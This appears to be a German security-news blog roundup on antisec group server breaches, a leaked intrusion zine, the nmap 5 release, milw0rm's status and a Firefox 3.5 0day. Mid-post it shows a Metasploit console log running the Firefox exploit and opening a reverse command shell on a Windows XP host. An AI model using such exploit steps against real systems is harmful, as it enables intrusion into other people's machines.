Nachdem in der letzten Zeit mehrere Server von IT-Security Seiten von der antisec Gruppe (hinter der angeblich der Hacker RoMeO steckt) gehackt wurden, gehen die Angriffe jetzt wohl weiter. Im Vorfeld der IT-Security Konferenz Blackhat veröffentlichen unbekannte Hacker nun die Dokumentation zahlreicher Server-Einbrüche im Zero for Owned Magazin. Opfer sind unter anderem Dan Kaminsky und Kevin Mitnick.

Den ganzen Bericht, kann man hier herunterladen. Genau wie in den Einbruchs-Dokumentation der antisec Gruppe, gibt es wieder allerlei sarkastische Kommentare und gute Unterhaltung. Und natürlich schüren die verschiedenen Einbrüche wieder die Gerüchte eines ssh Exploits.

Weitere Informationen und erste Kommentare der Betroffenen gibt es bei Heise.

nmap 5 ist raus. Hier gibt es die wichtigsten Änderungen:

nmap 5 changes

Die antisec Gruppe, welche für die Hacks der Server von astalavista.com, infosec.org.uk, ssanz.net, sowie den imageshack Hack vom Wochenende verantwortlich ist, kündigt auf der full-disclosure Mailing Liste an, die Server von hackforums.net und milw0rm.com zu hacken.

Allerdings schein gerade ein denial of service Angriff gegen den Server von hackforums.net statt zufinden und so bittet die anti-sec Gruppe, den unbekannten Urheber des Angriffes doch den Angriff einzustellen, damit man endlich den Server hacken kann. (LOL)

Die Gruppe verfügt angeblich über einen apache 0day exploit, welche alle apache Versionen betreffen soll. Was soll man davon halten. Man wird sehen.

Gestern wurde bei milw0rm ein 0day Exploit für die aktuelle Version von Firefox 3.5 veröffentlicht.

msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
msf exploit(firefox_escape_retval) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://192.168.1.102:80/test2
[*] Server started.
[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.101:2950...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.1.102:4444 -> 192.168.1.101:2951)
msf exploit(firefox_escape_retval) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:ProgrammeMozilla Firefox>

nachdem Heise und andere milw0rm für tot erklärt haben macht die Seite heute einen recht lebhaften Eindruck. Tot gesagte leben länger!

[und doch wieder down]

[und wieder zu erreichen ... was bloß da los?]